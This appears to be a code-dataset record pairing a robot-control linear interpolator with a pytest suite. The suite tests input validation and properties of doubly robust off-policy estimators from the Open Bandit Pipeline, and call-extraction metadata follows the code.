goal and updates internal parameters for next interpolation step Args: goal: Requested goal (either absolute or delta value). Should be same dimension as self.dim start: Only relevant if "self.use_delta_goal" is set. This is the current state from which the goal will be taken relative to Returns: None """ # First, check to make sure requested goal shape is the same as self.dim if goal.shape[0] != self.dim: print("Requested goal: {}".format(goal)) raise ValueError("LinearInterpolator: Input size wrong for goal; got {}, needs to be {}!".format( goal.shape[0], self.dim)) # Update goal and save start state self.goal = np.array(goal) self.start = start # Reset interpolation steps self.step = 0 def get_interpolated_goal(self, x): """ get_interpolated_goal: Takes the current state and provides the next step in interpolation given the remaining steps. NOTE: If this interpolator is for orientation, it is assumed to be receiving Args: x: Current state. Should be same dimension as self.dim NOTE: If this interpolator is for orientation, x is assumed to be the current relative rotation from the initial goal that was set. Otherwise, it is assumed to be an absolute value Returns: x_current: Next position in the interpolated trajectory """ # First, check to make sure x in same shape as self.dim if x.shape[0] != self.dim: print("Current position: {}".format(x)) raise ValueError("LinearInterpolator: Input size wrong; needs to be {}!".format(self.dim)) # Also make sure goal has been set if self.goal is None: raise ValueError("LinearInterpolator: Goal has not been set yet!") # Calculate the desired next step based on remaining interpolation steps if self.ori_interpolate: # This is an orientation interpolation, so we interpolate linearly around a sphere instead goal = self.goal if self.dim == 3: # this is assumed to be euler (x,y,z), so we need to first map to quat x = T.mat2quat(T.euler2mat(x)) goal = T.mat2quat(T.euler2mat(self.goal)) # Interpolate to the next sequence x_current = T.quat_slerp(x, goal, fraction=(self.step + 1) / self.total_steps) # Check if dx is greater than max value; if it is; clamp and notify user dx, clipped = T.clip_rotation(T.quat_distance(x_current, x), self.max_delta) if clipped: print( "LinearInterpolator: WARNING: Requested interpolation (ori) exceeds max speed;" "clamping to {}.".format(dx)) # Map back to euler if necessary x_current = dx if self.dim == 3: x_current = T.mat2euler(T.quat2mat(x_current)) else: # This is a normal interpolation dx = (self.goal - x) / (self.total_steps - self.step) # Check if dx is greater than max value; if it is; clamp and notify user dx, clipped = T.clip_translation(dx, self.max_delta) if clipped: print("LinearInterpolator: WARNING: Requested interpolation " "exceeds max speed; clamping to {}.".format(dx)) x_current = x + dx # Increment step if there's still steps remaining based on ramp ratio if self.step < self.total_steps - 1: self.step += 1 # Return the new interpolated step return x_current
[ "numpy.array", "numpy.ceil" ]
[((2000, 2051), 'numpy.ceil', 'np.ceil', (['(ramp_ratio * controller_freq / policy_freq)'], {}), '(ramp_ratio * controller_freq / policy_freq)\n', (2007, 2051), True, 'import numpy as np\n'), ((3292, 3306), 'numpy.array', 'np.array', (['goal'], {}), '(goal)\n', (3300, 3306), True, 'import numpy as np\n')]
import re import pytest import numpy as np import torch from obp.types import BanditFeedback from obp.ope import ( DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust, ) from conftest import generate_action_dist # prepare instances dm = DirectMethod() dr = DoublyRobust() dr_shrink_0 = DoublyRobustWithShrinkage(lambda_=0.0) dr_shrink_max = DoublyRobustWithShrinkage(lambda_=1e10) sndr = SelfNormalizedDoublyRobust() switch_dr_0 = SwitchDoublyRobust(tau=0.0) switch_dr_max = SwitchDoublyRobust(tau=1e10) dr_estimators = [dr, dr_shrink_0, sndr, switch_dr_0] # dr and self-normalized dr # action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description invalid_input_of_dr = [ ( generate_action_dist(5, 4, 3), None, np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), None, np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "reward must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), None, np.random.choice(3, size=5), np.zeros((5, 4, 3)), "pscore must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), None, "estimated_rewards_by_reg_model must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=float), np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action elements must be non-negative integers", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int) - 1, np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action elements must be non-negative integers", ), ( generate_action_dist(5, 4, 3), "4", np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros((3, 2), dtype=int), np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action must be 1-dimensional", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int) + 8, np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action elements must be smaller than the second dimension of action_dist", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), "4", np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "reward must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros((3, 2), dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "reward must be 1-dimensional", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(4, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action and reward must be the same size.", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), "4", np.random.choice(3, size=5), np.zeros((5, 4, 3)), "pscore must be ndarray", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.ones((5, 3)), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "pscore must be 1-dimensional", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.ones(4), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "action, reward, and pscore must be the same size.", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.arange(5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), "pscore must be positive", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), np.zeros((5, 4, 2)), "estimated_rewards_by_reg_model.shape must be the same as action_dist.shape", ), ( generate_action_dist(5, 4, 3), np.zeros(5, dtype=int), np.zeros(5, dtype=int), np.ones(5), np.random.choice(3, size=5), "4", "estimated_rewards_by_reg_model must be ndarray", ), ] @pytest.mark.parametrize( "action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description", invalid_input_of_dr, ) def test_dr_using_invalid_input_data( action_dist: np.ndarray, action: np.ndarray, reward: np.ndarray, pscore: np.ndarray, position: np.ndarray, estimated_rewards_by_reg_model: np.ndarray, description: str, ) -> None: # estimate_intervals function raises ValueError of all estimators for estimator in [dr, sndr]: with pytest.raises(ValueError, match=f"{description}*"): _ = estimator.estimate_policy_value( action_dist=action_dist, action=action, reward=reward, pscore=pscore, position=position, estimated_rewards_by_reg_model=estimated_rewards_by_reg_model, ) with pytest.raises(ValueError, match=f"{description}*"): _ = estimator.estimate_interval( action_dist=action_dist, action=action, reward=reward, pscore=pscore, position=position, estimated_rewards_by_reg_model=estimated_rewards_by_reg_model, ) # dr and self-normalized dr # action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description invalid_input_tensor_of_dr = [ ( torch.from_numpy(generate_action_dist(5, 4, 3)), None, torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), None, torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "reward must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), None, torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "pscore must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), None, "estimated_rewards_by_reg_model must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.float32), torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action elements must be non-negative integers", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64) - 1, torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action elements must be non-negative integers", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), "4", torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros((3, 2), dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action must be 1-dimensional", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64) + 8, torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action elements must be smaller than the second dimension of action_dist", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), "4", torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "reward must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros((3, 2), dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "reward must be 1-dimensional", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(4, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action and reward must be the same size.", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), "4", torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "pscore must be Tensor", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones((5, 3)), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "pscore must be 1-dimensional", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones(4), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "action, reward, and pscore must be the same size.", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.from_numpy(np.arange(5)), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), "pscore must be positive", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 2)), "estimated_rewards_by_reg_model.shape must be the same as action_dist.shape", ), ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.zeros(5, dtype=torch.int64), torch.zeros(5, dtype=torch.int64), torch.ones(5), torch.from_numpy(np.random.choice(3, size=5)), "4", "estimated_rewards_by_reg_model must be Tensor", ), ] @pytest.mark.parametrize( "action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description", invalid_input_tensor_of_dr, ) def test_dr_using_invalid_input_tensor_data( action_dist: torch.Tensor, action: torch.Tensor, reward: torch.Tensor, pscore: torch.Tensor, position: torch.Tensor, estimated_rewards_by_reg_model: torch.Tensor, description: str, ) -> None: # estimate_intervals function raises ValueError of all estimators for estimator in [dr, sndr]: with pytest.raises(ValueError, match=f"{description}*"): _ = estimator.estimate_policy_value_tensor( action_dist=action_dist, action=action, reward=reward, pscore=pscore, position=position, estimated_rewards_by_reg_model=estimated_rewards_by_reg_model, ) # switch-dr invalid_input_of_switch = [ ("a", "switching hyperparameter must be float or integer"), (-1.0, "switching hyperparameter must be larger than or equal to zero"), (np.nan, "switching hyperparameter must not be nan"), ] @pytest.mark.parametrize( "tau, description", invalid_input_of_switch, ) def test_switch_using_invalid_input_data(tau: float, description: str) -> None: with pytest.raises(ValueError, match=f"{description}*"): _ = SwitchDoublyRobust(tau=tau) valid_input_of_switch = [ (3.0, "float tau"), (2, "integer tau"), ] @pytest.mark.parametrize( "tau, description", valid_input_of_switch, ) def test_switch_using_valid_input_data(tau: float, description: str) -> None: _ = SwitchDoublyRobust(tau=tau) # dr-os invalid_input_of_shrinkage = [ ("a", "shrinkage hyperparameter must be float or integer"), (-1.0, "shrinkage hyperparameter must be larger than or equal to zero"), (np.nan, "shrinkage hyperparameter must not be nan"), ] @pytest.mark.parametrize( "lambda_, description", invalid_input_of_shrinkage, ) def test_shrinkage_using_invalid_input_data(lambda_: float, description: str) -> None: with pytest.raises(ValueError, match=f"{description}*"): _ = DoublyRobustWithShrinkage(lambda_=lambda_) valid_input_of_shrinkage = [ (3.0, "float lambda_"), (2, "integer lambda_"), ] @pytest.mark.parametrize( "lambda_, description", valid_input_of_shrinkage, ) def test_shrinkage_using_valid_input_data(lambda_: float, description: str) -> None: _ = DoublyRobustWithShrinkage(lambda_=lambda_) # dr variants valid_input_of_dr_variants = [ ( generate_action_dist(5, 4, 3), np.random.choice(4, size=5), np.zeros(5, dtype=int), np.random.uniform(low=0.5, high=1.0, size=5), np.random.choice(3, size=5), np.zeros((5, 4, 3)), 0.5, "all argumnents are given and len_list > 1", ) ] @pytest.mark.parametrize( "action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description", valid_input_of_dr_variants, ) def test_dr_variants_using_valid_input_data( action_dist: np.ndarray, action: np.ndarray, reward: np.ndarray, pscore: np.ndarray, position: np.ndarray, estimated_rewards_by_reg_model: np.ndarray, hyperparameter: float, description: str, ) -> None: # check dr variants switch_dr = SwitchDoublyRobust(tau=hyperparameter) dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter) for estimator in [switch_dr, dr_os]: est = estimator.estimate_policy_value( action_dist=action_dist, action=action, reward=reward, pscore=pscore, position=position, estimated_rewards_by_reg_model=estimated_rewards_by_reg_model, ) assert est == 0.0, f"policy value must be 0, but {est}" # dr variants valid_input_tensor_of_dr_variants = [ ( torch.from_numpy(generate_action_dist(5, 4, 3)), torch.from_numpy(np.random.choice(4, size=5)), torch.zeros(5, dtype=torch.int64), torch.from_numpy(np.random.uniform(low=0.5, high=1.0, size=5)), torch.from_numpy(np.random.choice(3, size=5)), torch.zeros((5, 4, 3)), 0.5, "all argumnents are given and len_list > 1", ) ] @pytest.mark.parametrize( "action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description", valid_input_tensor_of_dr_variants, ) def test_dr_variants_using_valid_input_tensor_data( action_dist: torch.Tensor, action: torch.Tensor, reward: torch.Tensor, pscore: torch.Tensor, position: torch.Tensor, estimated_rewards_by_reg_model: torch.Tensor, hyperparameter: float, description: str, ) -> None: # check dr variants dr_os = DoublyRobustWithShrinkage(lambda_=hyperparameter) for estimator in [dr_os]: est = estimator.estimate_policy_value_tensor( action_dist=action_dist, action=action, reward=reward, pscore=pscore, position=position, estimated_rewards_by_reg_model=estimated_rewards_by_reg_model, ) assert est.item() == 0.0, f"policy value must be 0, but {est.item()}" def test_dr_using_random_evaluation_policy( synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray ) -> None: """ Test the format of dr variants using synthetic bandit data and random evaluation policy """ expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis] action_dist = random_action_dist # prepare input dict input_dict = { k: v for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_dict["action_dist"] = action_dist input_dict["estimated_rewards_by_reg_model"] = expected_reward # dr estimtors require all arguments for estimator in dr_estimators: estimated_policy_value = estimator.estimate_policy_value(**input_dict) assert isinstance( estimated_policy_value, float ), f"invalid type response: {estimator}" # remove necessary keys del input_dict["reward"] del input_dict["pscore"] del input_dict["action"] del input_dict["estimated_rewards_by_reg_model"] for estimator in dr_estimators: with pytest.raises( TypeError, match=re.escape( "estimate_policy_value() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'" ), ): _ = estimator.estimate_policy_value(**input_dict) # prepare input dict input_tensor_dict = { k: v if v is None else torch.from_numpy(v) for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_tensor_dict["action_dist"] = torch.from_numpy(action_dist) input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy( expected_reward ) # dr estimtors require all arguments for estimator in dr_estimators: if estimator.estimator_name == "switch-dr": with pytest.raises( NotImplementedError, match=re.escape( "This is not implemented for Swtich-DR because it is indifferentiable." ), ): _ = estimator.estimate_policy_value_tensor(**input_tensor_dict) else: estimated_policy_value = estimator.estimate_policy_value_tensor( **input_tensor_dict ) assert isinstance( estimated_policy_value, torch.Tensor ), f"invalid type response: {estimator}" # remove necessary keys del input_tensor_dict["reward"] del input_tensor_dict["pscore"] del input_tensor_dict["action"] del input_tensor_dict["estimated_rewards_by_reg_model"] for estimator in dr_estimators: if estimator.estimator_name == "switch-dr": with pytest.raises( NotImplementedError, match=re.escape( "This is not implemented for Swtich-DR because it is indifferentiable." ), ): _ = estimator.estimate_policy_value_tensor(**input_tensor_dict) else: with pytest.raises( TypeError, match=re.escape( "estimate_policy_value_tensor() missing 4 required positional arguments: 'reward', 'action', 'pscore', and 'estimated_rewards_by_reg_model'" ), ): _ = estimator.estimate_policy_value_tensor(**input_tensor_dict) def test_boundedness_of_sndr_using_random_evaluation_policy( synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray ) -> None: """ Test the boundedness of sndr estimators using synthetic bandit data and random evaluation policy """ expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis] action_dist = random_action_dist # prepare input dict input_dict = { k: v for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_dict["action_dist"] = action_dist input_dict["estimated_rewards_by_reg_model"] = expected_reward # make pscore too small (to check the boundedness of sndr) input_dict["pscore"] = input_dict["pscore"] ** 3 estimated_policy_value = sndr.estimate_policy_value(**input_dict) assert ( estimated_policy_value <= 2 ), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value}" # prepare input dict input_tensor_dict = { k: v if v is None else torch.from_numpy(v) for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_tensor_dict["action_dist"] = torch.from_numpy(action_dist) input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy( expected_reward ) # make pscore too small (to check the boundedness of sndr) input_tensor_dict["pscore"] = input_tensor_dict["pscore"] ** 3 estimated_policy_value = sndr.estimate_policy_value_tensor(**input_tensor_dict) assert ( estimated_policy_value.item() <= 2 ), f"estimated policy value of sndr should be smaller than or equal to 2 (because of its 2-boundedness), but the value is: {estimated_policy_value.item()}" def test_dr_shrinkage_using_random_evaluation_policy( synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray ) -> None: """ Test the dr shrinkage estimators using synthetic bandit data and random evaluation policy """ expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis] action_dist = random_action_dist # prepare input dict input_dict = { k: v for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_dict["action_dist"] = action_dist input_dict["estimated_rewards_by_reg_model"] = expected_reward dm_value = dm.estimate_policy_value(**input_dict) dr_value = dr.estimate_policy_value(**input_dict) dr_shrink_0_value = dr_shrink_0.estimate_policy_value(**input_dict) dr_shrink_max_value = dr_shrink_max.estimate_policy_value(**input_dict) assert ( dm_value == dr_shrink_0_value ), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod" assert ( np.abs(dr_value - dr_shrink_max_value) < 1e-5 ), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust" # prepare input dict input_tensor_dict = { k: v if v is None else torch.from_numpy(v) for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_tensor_dict["action_dist"] = torch.from_numpy(action_dist) input_tensor_dict["estimated_rewards_by_reg_model"] = torch.from_numpy( expected_reward ) dm_value = dm.estimate_policy_value_tensor(**input_tensor_dict) dr_value = dr.estimate_policy_value_tensor(**input_tensor_dict) dr_shrink_0_value = dr_shrink_0.estimate_policy_value_tensor(**input_tensor_dict) dr_shrink_max_value = dr_shrink_max.estimate_policy_value_tensor( **input_tensor_dict ) assert ( dm_value.item() == dr_shrink_0_value.item() ), "DoublyRobustWithShrinkage (lambda=0) should be the same as DirectMethod" assert ( np.abs(dr_value.item() - dr_shrink_max_value.item()) < 1e-5 ), "DoublyRobustWithShrinkage (lambda=inf) should be almost the same as DoublyRobust" def test_switch_dr_using_random_evaluation_policy( synthetic_bandit_feedback: BanditFeedback, random_action_dist: np.ndarray ) -> None: """ Test the switch_dr using synthetic bandit data and random evaluation policy """ expected_reward = synthetic_bandit_feedback["expected_reward"][:, :, np.newaxis] action_dist = random_action_dist # prepare input dict input_dict = { k: v for k, v in synthetic_bandit_feedback.items() if k in ["reward", "action", "pscore", "position"] } input_dict["action_dist"] = action_dist input_dict["estimated_rewards_by_reg_model"] = expected_reward dm_value = dm.estimate_policy_value(**input_dict) dr_value = dr.estimate_policy_value(**input_dict) switch_dr_0_value = switch_dr_0.estimate_policy_value(**input_dict) switch_dr_max_value = switch_dr_max.estimate_policy_value(**input_dict) assert ( dm_value == switch_dr_0_value ), "SwitchDR (tau=0) should be the same as DirectMethod" assert ( dr_value == switch_dr_max_value ), "SwitchDR (tau=1e10) should be the same as DoublyRobust"
[ "torch.ones", "numpy.random.uniform", "obp.ope.SelfNormalizedDoublyRobust", "numpy.abs", "conftest.generate_action_dist", "numpy.zeros", "numpy.ones", "re.escape", "obp.ope.DoublyRobustWithShrinkage", "pytest.raises", "obp.ope.SwitchDoublyRobust", "numpy.arange", "numpy.random.choice", "torch.zeros", "pytest.mark.parametrize", "obp.ope.DoublyRobust", "obp.ope.DirectMethod", "torch.from_numpy" ]
[((310, 324), 'obp.ope.DirectMethod', 'DirectMethod', ([], {}), '()\n', (322, 324), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((330, 344), 'obp.ope.DoublyRobust', 'DoublyRobust', ([], {}), '()\n', (342, 344), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((359, 397), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(0.0)'}), '(lambda_=0.0)\n', (384, 397), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((414, 462), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': '(10000000000.0)'}), '(lambda_=10000000000.0)\n', (439, 462), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((461, 489), 'obp.ope.SelfNormalizedDoublyRobust', 'SelfNormalizedDoublyRobust', ([], {}), '()\n', (487, 489), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((504, 531), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(0.0)'}), '(tau=0.0)\n', (522, 531), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((548, 585), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': '(10000000000.0)'}), '(tau=10000000000.0)\n', (566, 585), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((5200, 5348), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_of_dr)\n", (5223, 5348), False, 'import pytest\n'), ((12126, 12281), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description"""', 'invalid_input_tensor_of_dr'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description'\n , invalid_input_tensor_of_dr)\n", (12149, 12281), False, 'import pytest\n'), ((13281, 13349), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'invalid_input_of_switch'], {}), "('tau, description', invalid_input_of_switch)\n", (13304, 13349), False, 'import pytest\n'), ((13623, 13689), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""tau, description"""', 'valid_input_of_switch'], {}), "('tau, description', valid_input_of_switch)\n", (13646, 13689), False, 'import pytest\n'), ((14060, 14135), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'invalid_input_of_shrinkage'], {}), "('lambda_, description', invalid_input_of_shrinkage)\n", (14083, 14135), False, 'import pytest\n'), ((14442, 14515), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""lambda_, description"""', 'valid_input_of_shrinkage'], {}), "('lambda_, description', valid_input_of_shrinkage)\n", (14465, 14515), False, 'import pytest\n'), ((15021, 15192), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_of_dr_variants)\n", (15044, 15192), False, 'import pytest\n'), ((16452, 16630), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description"""', 'valid_input_tensor_of_dr_variants'], {}), "(\n 'action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, hyperparameter, description'\n , valid_input_tensor_of_dr_variants)\n", (16475, 16630), False, 'import pytest\n'), ((13787, 13814), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13805, 13814), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14620, 14662), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14645, 14662), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15514, 15552), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'hyperparameter'}), '(tau=hyperparameter)\n', (15532, 15552), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((15565, 15614), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (15590, 15614), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((16967, 17016), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'hyperparameter'}), '(lambda_=hyperparameter)\n', (16992, 17016), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((19122, 19151), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (19138, 19151), False, 'import torch\n'), ((19210, 19243), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (19226, 19243), False, 'import torch\n'), ((22273, 22302), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (22289, 22302), False, 'import torch\n'), ((22361, 22394), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (22377, 22394), False, 'import torch\n'), ((24309, 24338), 'torch.from_numpy', 'torch.from_numpy', (['action_dist'], {}), '(action_dist)\n', (24325, 24338), False, 'import torch\n'), ((24397, 24430), 'torch.from_numpy', 'torch.from_numpy', (['expected_reward'], {}), '(expected_reward)\n', (24413, 24430), False, 'import torch\n'), ((792, 821), 